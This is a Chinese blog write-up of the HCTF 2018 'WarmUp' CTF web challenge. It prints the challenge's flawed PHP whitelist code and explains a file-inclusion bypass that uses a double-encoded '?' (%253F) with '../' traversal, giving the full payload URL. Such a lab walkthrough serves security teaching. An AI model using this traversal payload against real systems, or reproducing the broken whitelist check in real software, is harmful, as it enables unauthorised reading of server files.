web:[HCTF 2018]WarmUp

已于 2023-09-21 22:13:22 修改
阅读量300 收藏
点赞数
分类专栏: BUUCTF-WEB 文章标签: 前端 网络安全 web安全
于 2023-09-21 18:35:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsumall04/article/details/133142502
版权

题目

点进页面,页面只有一张滑稽脸,没有其他的提示信息

查看网页源代码,发现source.php,尝试访问一下

跳转至该页面,页面显示为一段php代码,需要进行代码审计

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            //白名单验证
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }//isset是判断page是否为空。由于传进来的page为一个字符串且不为空,所以返回false

            if (in_array($page, $whitelist)) {
               //对输入进行判断,是否为白名单类的内容
                return true;
            }/*in_array的意思是判断page里是否包含白名单里的内容 例如source.php  hint.php。
              就是page=source.php或者hint.php才行.所以最后返回了false。*/


            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
       /*这里mb_substr 是个截断,返回0到mb_strpos之间的内容,而mb_strpos 则是查找第一次出现的位置,所以基本可以理解为获取page 两个?之间的字符串,也就是获取file两个?之间的字符串,放到url中就是http://ip/?file=ddd?中的file=ddd*/
            if (in_array($_page, $whitelist)) {
                return true;
            }
/*经过上面的截断代码,page=source.php  所以返回true ,文件可以得到包含,结束,下面的代码就不用在执行了*/

            $_page = urldecode($page);//进行url解码
            //输入的url会进行一次解码,通过这个函数进行再一次解码,所以对“?”要进行二次编码==》%253F(%25是%的url编码,进行过一次后为%3F,在进行一次解码后变为“?”)
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file']) //输入不能为空
        && is_string($_REQUEST['file'])//判断是否为string类型
        && emmm::checkFile($_REQUEST['file'])//调用emm类中的checkFile方法
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

先访问hint.php看看有没有别的提示信息

根据提示信息,进行目录穿越可获得flag,这里flag写了四次,可能使用四个或五个../

构造payload

http://1f0787c3-39e3-43b6-9583-f8ecb87aae1c.node4.buuoj.cn:81/?file=hint.php%253F../../../../../ffffllllaaaagggg

得到flag

总结

mb_substr()函数返回字符串的一部分,substr()函数,只针对英文字符,如果要分割的中文文字则需要使用mb_substr()。

若start参数是负数且length小于或等于start,则length为0

如果在测试时没有匹配到指定符号,将返回字符串长度

代码审计参考链接:

[HCTF 2018]WarmUp_ke1nys的博客-CSDN博客

[HCTF 2018]WarmUp_浑水摸鱼的咸鱼的博客-CSDN博客

sleepywin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
neo_warmup:热身 Neo4j
06-05
构建它: mvn clean package将 target/warmup-1.0.jar 复制到 Neo4j 服务器的 plugins/ 目录中。 通过在 conf/neo4j-server.properties 中添加一行来配置 Neo4j: org.neo4j.server.thirdparty_jaxrs_classes=...
TensorFlow Serving API设置warmup
01-07
运行后附代码文件生成tf_serving_warmup_requests文件; 置其于模型保存文件夹内的assets.extra文件夹下; 重启docker API即可,可观察到屏幕输出显示warmp启动成功; 保存模型的文件结构于是乎成为: . ├── ...
HCTF2018-web-warmup
baola的博客
08-04 656
HCTF2018-web-warmup 这题是根据CVE-2018-12613 phpMyAdmin文件包含漏洞改编而来。 所以需要有文件包含漏洞的基础知识,php代码基础
HCTF-2018-Web-warmup WriteUp
Ephemerally的博客
06-04 593
题目环境在CTFhub上,在下方链接搜索warmup即可。 https://www.ctfhub.com/#/challenge 打开环境,只发现了一张滑稽图。如下 我们看一眼源码,并没有发现什么有用的信息,但是这一行有点问题。 我们尝试访问一下这个东西,然后发现这是一道代码审计题。 http://challenge-73ef6a42b59996b3.sandbox.ctfhub.com:10080/?file=source.php <?php highlight_file(__FIL
Buuctf-Web-[HCTF 2018]Warm Up 题解&代码审计
m0_62239233的博客
04-22 1356
Buuctf-Web-[HCTF 2018]Warm Up 题解&代码审计
web-[HCTF 2018]WarmUp
wojiushilsy的博客
04-03 262
ad
[HCTF 2018]WarmUp(Web)
weixin_44728681的博客
02-23 149
BUUCTF [HCTF 2018]WarmUp(Web)
[HCTF 2018] web题-WarmUp
BROTHERYY的博客
06-28 763
//复现地址:https://buuoj.cn/challenges 开启环境后得到的一个表情~ 查看源代码可以发现还有个source.php 进入source.php,获得源码一份 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=&gt
warmup:IP预热插件
03-20
【标题】:“warmup:IP预热插件” 在IT行业中,"warmup:IP预热插件"指的是一个特定的软件工具,主要用于提高网络服务的性能和稳定性。这个插件设计的目的是在正式对外提供服务之前,预先对服务器的IP地址进行“预热...
Javascript-Warmup:http
06-05
在JavaScript的世界里,"Warmup"通常指的是对特定技术或概念进行初步理解和实践的过程,旨在帮助开发者快速上手。在这个"Javascript-Warmup:http"的主题中,我们将深入探讨JavaScript中的HTTP(超文本传输协议)相关...
warmup:HTTP缓存预热
05-13
go get -u github.com/peterhellberg/warmup 预热的用法 -base-url="http://0.0.0.0:7000": The base URL used for paths -color=true: If you want the output in color -delay=100: Delay (in ms) between ...
【BUUCTF】Web之[HCTF 2018]WarmUp 1
qq_45972928的博客
05-02 1179
1、首先打开题目链接 2、因为是php代码审计,所以我们尝试寻找代码。先查看网页源码 这里发现一个注释的php文件 3、尝试对source.php进行访问 4、出现了php代码,进行代码分析 ① 观察参数file,首先file不能为空,其次要满足是字符串类型 php if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFil.
Buuctf-Web-[HCTF 2018]WarmUp
御七彩虹猫
05-12 558
Buuctf-Web-[HCTF 2018]WarmUp
第 五 周 write up [[HFCTF2020]JustEscape [BJDCTF2020]EasySearch HCTF-2018-Web-warmup]
tothemoon的博客
10-22 1262
我的博客:[http://tothemoon2019.github.io](https://tothemoon2019.github.io/2020/10/21/%E7%AC%AC%20%E4%BA%94%20%E5%91%A8%20write%20up%20%5B%5BHFCTF2020%5DJustEscape%5D/) 文章目录[HFCTF2020]JustEscape(VM沙箱逃逸)0x000x0112success[BJDCTF2020]EasySearch(shtml,ssi注入)ssi注入su
buuctf web [HCTF 2018]WarmUp
凝聚力安全团队
11-11 339
buuctf靶场:https://buuoj.cn/ 打开题目,发现一张大脸 查看页面源代码,发现一个注释 访问source.php,可以看到以下源代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php"
更新商品前端接口编写
最新发布
weixin_55639995的博客
07-12 201
那么在vue运行的时候,会加载所有的ref属性特征的元素还有组件。标签中ref的作用就是将 该组件注册到vue对象的ref属性中。使用插槽,那个scope就是代表着一行的数据。然后里面的选项遍历的是 js定义的数据。如果文字显示过多可以使用 文本隐藏显示。表单绑定还有表单数据的绑定。数据绑定使用的表单绑定状态。写form表单然后封装数据。状态的选择使用的是选择框。副标题使用的是文本域。状态页面使用,下拉框。富文本选择器使用组件。使用后端枚举类型去写。
Node多版本管理器NVM安装使用
GongWeiBuQi的博客
07-11 144
安装node很方便,只需要一条命令可以轻松切换node版本可以多版本node并存。
vue实现预览编辑ppt、word、pdf、excel、等功能的解决方案(内网-前端
m0_68271787的博客
07-10 626
在Vue中实现预览和编辑PPT、Word、PDF、Excel等文件的功能,尤其是在内网环境下且主要侧重于前端,我们需要明确的是,直接在前端编辑这些格式的文件(特别是PPT和Word)是非常复杂且通常不推荐的,因为这些格式涉及复杂的布局和格式设置。然而,我们可以实现预览功能,并可能通过一些间接方式支持简单的编辑(如表格数据的修改)。下面我将分别给出预览PPT、Word、PDF、Excel文件的Vue组件示例代码,并简要说明如何可能实现简单的编辑功能。
[HCTF 2018]WarmUp
08-29
[HCTF 2018]WarmUp是一个CTF比赛题目,其中涉及到一个叫做emmm的类。这个类中有一个名为checkFile的方法。checkFile方法的作用是对传入的$page参数进行检查。在方法中,首先判断$page是否存在并且是字符串类型,如果...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值